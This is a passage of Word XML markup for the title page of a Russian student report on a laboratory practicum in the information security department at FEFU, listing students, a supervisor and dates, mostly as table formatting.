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236B7A" w:rsidRPr="002316FE" w14:paraId="773EFF41" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EF20F3B" w14:textId="0780EC98" w:rsidR="00236B7A" w:rsidRPr="002316FE" w:rsidRDefault="00D25505" w:rsidP="00C473FD">
            <w:pPr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02DEBE87" wp14:editId="7A6172E0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6B7A" w:rsidRPr="002316FE">
              <w:t xml:space="preserve">МИНИСТЕРСТВО НАУКИ </w:t>
            </w:r>
            <w:r w:rsidR="00236B7A">
              <w:t xml:space="preserve">И ВЫСШЕГО </w:t>
            </w:r>
            <w:r w:rsidR="00236B7A" w:rsidRPr="002316FE">
              <w:t>ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="4F2EDCCD" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46D362FD" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="002F5CBB" w:rsidRDefault="00236B7A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36895FD9" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00A130B9" w:rsidRDefault="00236B7A" w:rsidP="002F5CBB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236B7A" w:rsidRPr="002316FE" w14:paraId="59B2D607" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53D97D90" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00827C40" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="1F101123" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:trPr>
          <w:trHeight w:val="170"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858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3CC9A6C8" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="0CDA0802" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="466E3452" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="622578BC" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2371DC84" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="0092125A" w14:paraId="552A84FC" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5295BAC2" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="0092125A" w14:paraId="3D5D57BE" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B3C8F96" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7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92125A" w14:paraId="1962E5AC" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40FBDD3B" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7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92125A" w14:paraId="79E6FBE6" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0211A4AC" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A" w:rsidP="00EE2DA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ой безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="09CD8861" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D5AA736" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7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757BC" w14:paraId="675AEB0A" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CF5A8D6" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7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757BC" w14:paraId="2BE2A654" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25F7BB8C" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7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757BC" w14:paraId="5B163647" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3113AE65" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="22C95031" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E2D169C" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="0092125A" w:rsidRDefault="00236B7A" w:rsidP="002171FF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</w:t>
            </w:r>
            <w:r w:rsidRPr="00C914E7">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">хождении учебной </w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">практики </w:t>
            </w:r>
            <w:r w:rsidRPr="00C914E7">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>у</w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98" w:rsidRPr="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>чебно-лабораторн</w:t>
            </w:r>
            <w:r w:rsidR="002171FF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ого</w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98" w:rsidRPr="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> практикум</w:t>
            </w:r>
            <w:r w:rsidR="002171FF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>а</w:t>
            </w:r>
            <w:r w:rsidRPr="00C914E7">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="0C35380E" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20162279" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003757BC" w:rsidRDefault="00236B7A" w:rsidP="00C473FD">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="480E4F74" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70B4181F" w14:textId="1E3A7CD2" w:rsidR="00236B7A" w:rsidRPr="003757BC" w:rsidRDefault="00236B7A" w:rsidP="008173A6">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="057670C2" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="680AE816" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="002A42EA" w:rsidRDefault="00236B7A" w:rsidP="00C473FD">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003423DE" w14:paraId="67BC61D4" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BD07102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C2BD8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A7B00AA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BD57C0F" w14:textId="2BA2BA83" w:rsidR="00ED6C98" w:rsidRDefault="00236B7A" w:rsidP="00ED6C98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>Выполнил</w:t>
            </w:r>
            <w:r w:rsidR="00387207">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidRPr="00A85FD7">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> студент</w:t>
            </w:r>
            <w:r w:rsidR="00387207">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ы</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2805207F" w14:textId="5BD44C5D" w:rsidR="00236B7A" w:rsidRPr="00A85FD7" w:rsidRDefault="00236B7A" w:rsidP="00ED6C98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С8</w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00387207">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>-10.05.01ммзи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003423DE" w14:paraId="73F89723" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4101FCF9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452B913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92AE7E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3A3D1880" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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0A3BFC02" w14:textId="1B1EE4D9" w:rsidR="00387207" w:rsidRPr="00C5470F" w:rsidRDefault="00813F2C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шников </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>И.Ю</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3951ED84" w14:textId="77777777" w:rsidR="00387207" w:rsidRDefault="00387207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абаев А.Б.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E1C2BC" w14:textId="2FFCC57B" w:rsidR="00387207" w:rsidRPr="00387207" w:rsidRDefault="00387207" w:rsidP="00CA5DB5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те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36B7A" w:rsidRPr="00CA5DB5" w14:paraId="7DE92251" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22CB08B0" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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6218FBDC" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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3832267" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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08CBB073" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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093CD5F7" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="007E42A3" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="086486CE" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73D68977" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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423DE" w14:paraId="3BF4E786" w14:textId="77777777" w:rsidTr="00B37F43">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="139447F5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3A99418B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4744C89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1CA8F1D9" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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1852CFA7" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="009F7F63" w:rsidRDefault="00236B7A" w:rsidP="00B3098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36B7A" w:rsidRPr="003423DE" w14:paraId="1B731247" w14:textId="77777777" w:rsidTr="00B37F43">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D62DFD0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5310A21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55E461E" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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CB4B43B" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00ED6C98" w:rsidP="007F23A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236B7A">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> кафедры информационной безопасности ШЕН</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003423DE" w14:paraId="441B54D7" w14:textId="77777777" w:rsidTr="009207F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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F547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C1E6335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0CDDC" w14:textId="5E715E7E" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A" w:rsidP="0038720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9763017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61F9A8D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7578F5E6" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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C7E8139" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00A85FD7" w:rsidRDefault="00236B7A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5C304D88" w14:textId="5B02E498" w:rsidR="00236B7A" w:rsidRPr="00A85FD7" w:rsidRDefault="00387207" w:rsidP="00387207">
            <w:pPr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ов </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>С.С.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w14:paraId="3722FF72" w14:textId="77777777" w:rsidTr="009207F6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14:paraId="67928E4D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7C6A03C6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0A1FC10A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7F3D44B7" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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C822780" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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58323FA0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BFCD25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B2DCD1F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236B7A" w:rsidRPr="003757BC" w14:paraId="1E432FF7" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54AE8271" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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CF1493" w14:textId="3F7F093D" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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45517FB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3F85C416" w14:textId="0E3AF08E" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A" w:rsidP="00ED6C9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C059E9" w14:textId="0747FB44" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A" w:rsidP="00ED6C98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</w:t>
            </w:r>
            <w:r w:rsidR="00ED6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00387207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3345F1EC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D5EC001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6F8B4F6" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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757BC" w14:paraId="4B569E33" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1293CE1B" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003423DE" w14:paraId="406E8884" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54FFF3CD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A38E12D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3237627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278AB48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A4FBF66" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003423DE" w14:paraId="6405BE09" w14:textId="77777777" w:rsidTr="00946271">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B780F56" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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F138D8" w14:textId="0EA02584" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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7C1EB82B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418C33A5" w14:textId="41E3B3DE" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A" w:rsidP="00ED6C9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AA61BAE" w14:textId="2552266B" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A" w:rsidP="00ED6C98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6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00387207">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>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1180BAC8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28A3299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5AC3C3F0" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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2340BC69" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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88C30B" w14:textId="29C29CA3" w:rsidR="00236B7A" w:rsidRPr="005311D6" w:rsidRDefault="00387207" w:rsidP="00ED6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6AAF27A1" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="005311D6" w:rsidRDefault="00236B7A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C9032E3" w14:textId="35C8E191" w:rsidR="00236B7A" w:rsidRPr="005311D6" w:rsidRDefault="00387207" w:rsidP="00ED6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я</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22FD21C8" w14:textId="02C23D38" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A" w:rsidP="005B50A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73A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00387207">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>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236B7A" w:rsidRPr="003423DE" w14:paraId="35A6F07F" w14:textId="77777777" w:rsidTr="00946271">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B584AF1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53FDA11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D9D81D6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2E8AC968" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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1D5D6C61" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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1397A9" w14:textId="73DC2D4E" w:rsidR="00236B7A" w:rsidRPr="005311D6" w:rsidRDefault="00387207" w:rsidP="00BC41D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1EAE00BE" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="005311D6" w:rsidRDefault="00236B7A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45F4467" w14:textId="77EA23B3" w:rsidR="00236B7A" w:rsidRPr="005311D6" w:rsidRDefault="00387207" w:rsidP="00EC110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югя</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25CFF2EB" w14:textId="74F6C8F3" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A" w:rsidP="00ED6C9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6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00813F2C">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>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236B7A" w:rsidRPr="003423DE" w14:paraId="1B69BAB4" w14:textId="77777777" w:rsidTr="00C473FD"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14:paraId="60650AC8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F5B81E9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149386AA" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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7AA1D204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D02CE61" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE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5FB41A81" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="003423DE" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="00CA5DB5" w14:paraId="1E714C7E" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="422C5E30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3B262643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196B57A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4DBCDAB1" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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11E9C2E" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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6E5A6F6B" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="43ED7535" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B90318C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5C9B567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6411FD7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6F3268" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00EC0AD5" w:rsidRDefault="00236B7A" w:rsidP="00946271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236B7A" w:rsidRPr="003757BC" w14:paraId="1418AC6B" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07B6394A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4C086D9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902312A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424D554" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00EC0AD5" w:rsidRDefault="00236B7A" w:rsidP="00EC110E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EC0AD5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>безопасности  ШЕН</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EC0AD5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> ДВФУ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="2BFFC161" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="119B417E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C2C303B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642F66B" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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21F41614" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00CA5DB5" w:rsidRDefault="00236B7A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36B7A" w:rsidRPr="003757BC" w14:paraId="5BE46BC8" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DAA5DFD" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00434B48" w:rsidRDefault="00236B7A" w:rsidP="00EC110E">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="726ACFBB" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6507AC53" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00434B48" w:rsidRDefault="00236B7A" w:rsidP="00EC110E">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="2E1A4D17" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
